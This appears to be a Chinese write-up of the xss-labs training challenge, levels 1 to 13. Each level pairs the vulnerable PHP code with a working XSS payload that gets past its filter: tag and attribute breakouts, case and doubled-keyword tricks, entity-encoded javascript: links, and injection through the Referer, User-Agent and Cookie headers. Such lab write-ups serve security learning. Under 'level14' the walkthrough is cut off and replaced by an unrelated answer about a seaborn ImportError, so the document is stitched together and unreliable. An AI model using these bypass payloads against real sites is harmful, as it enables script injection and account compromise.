XSS(七)xsslab

XSS(七)xsslab

level1

无过滤:name=<script>alert(/xss/)</script>

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

level2

闭合:"><script>alert(/xss/)</script>

">onmouseover='alert(/xss/)

第一处在PHP代码块的echo中输出,第二处在表单input中输出,第
一处用htmlspeciachars()做了转义,第二处并没有做限制,闭合
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<input name=keyword  value="'.$str.'">

level3

闭合: onmouseover='alert(/xss/)

将两个输出点都做了htmlspecialchars()转义,那既然做了转义那么双引号和尖括号就没有效果了,但是单引号在这个函数中如果没做特殊的改动,默认是可以出效果的,而且源码中的value是用单引号,看来是有意让使用单引号。
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='onmouseover='alert(/xss/)'>  (onmouseover:事件)


level4

" onmouseover="alert(/xss/)

这里的俩个输出点,一个被转义,另外一个将尖括号替换为空
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">

level5

"><a href="javascript:alert:alert(/xss/)">xss</a>

将<script和on进行了替换
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">

level6

大小写绕过:"><sCript>alert(/xss/)</sCript>

level7

将特殊字符替换成空字符,这样可以采用补充撮合的方法达到XSS攻击效果。
" oonnmouseover="alert(/xss/)
"><scscriptript>alert(/xss/)</scscriptript>

level8

将字符转换为小写,然后过滤特殊字符和双引号,加了一个转义函数输出,,代码处的添加友情链接是
突破点,在input框中输入字符提交之后,在友情链接处会载入一个拼接后的a标签,因为javascript被过滤对其进行编码绕过再点击友情链接即可。
java&#x73;cript:alert(/xss/)

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

level9

这次在上一题的基础上加入了strpos()函数,查找如果url中找到'http'那么会返回找
到位置的位数,自然不会返回0也就不会等于false,那么就可以绕过限制了,但是为什么会
这么做呢?回想了下,应该是让输入框必须要输入合法的URL即带有http的字符串,那么
可以向输入框加进去就可以绕过了。

java&#x73;cript:alert(’http:/baidu.com')//http://

level10


&t_sort=xss" onmouseover=alert(/xss/) type="text"
这道题有俩个输出的地方,第一个被实体化过滤,第二个是隐藏表单的"t_sort"参数
即'$str33',过滤了尖括号,那么就在input标签中触发xss即可,可以用onmouseover或者
是onclick,需要将隐藏表单显示出来触发:
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">

level11

Referer: " onmouseover=alert(/xss/) type="text
hidden隐藏了表单,str与str00都被做了转义,可以对输出的$str33写xss语句,
burp抓包改referer即可

level12

同上题原理,改user-agent就可以了
User-Agent:" onclick=alert(/xss/) type="text

level13

同上,改cookie中的user即可
 " onfocus=alert(/xss/) type="text

level14


出现这个错误的原因是在导入seaborn包时,无法从typing模块中导入名为'Protocol'的对象。 解决这个问题的方法有以下几种: 1. 检查你的Python版本是否符合seaborn包的要求,如果不符合,尝试更新Python版本。 2. 检查你的环境中是否安装了typing_extensions包,如果没有安装,可以使用以下命令安装:pip install typing_extensions。 3. 如果你使用的是Python 3.8版本以下的版本,你可以尝试使用typing_extensions包来代替typing模块来解决该问题。 4. 检查你的代码是否正确导入了seaborn包,并且没有其他导入错误。 5. 如果以上方法都无法解决问题,可以尝试在你的代码中使用其他的可替代包或者更新seaborn包的版本来解决该问题。 总结: 出现ImportError: cannot import name 'Protocol' from 'typing'错误的原因可能是由于Python版本不兼容、缺少typing_extensions包或者导入错误等原因造成的。可以根据具体情况尝试上述方法来解决该问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ImportError: cannot import name ‘Literal‘ from ‘typing‘ (D:\Anaconda\envs\tensorflow\lib\typing....](https://blog.youkuaiyun.com/yuhaix/article/details/124528628)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值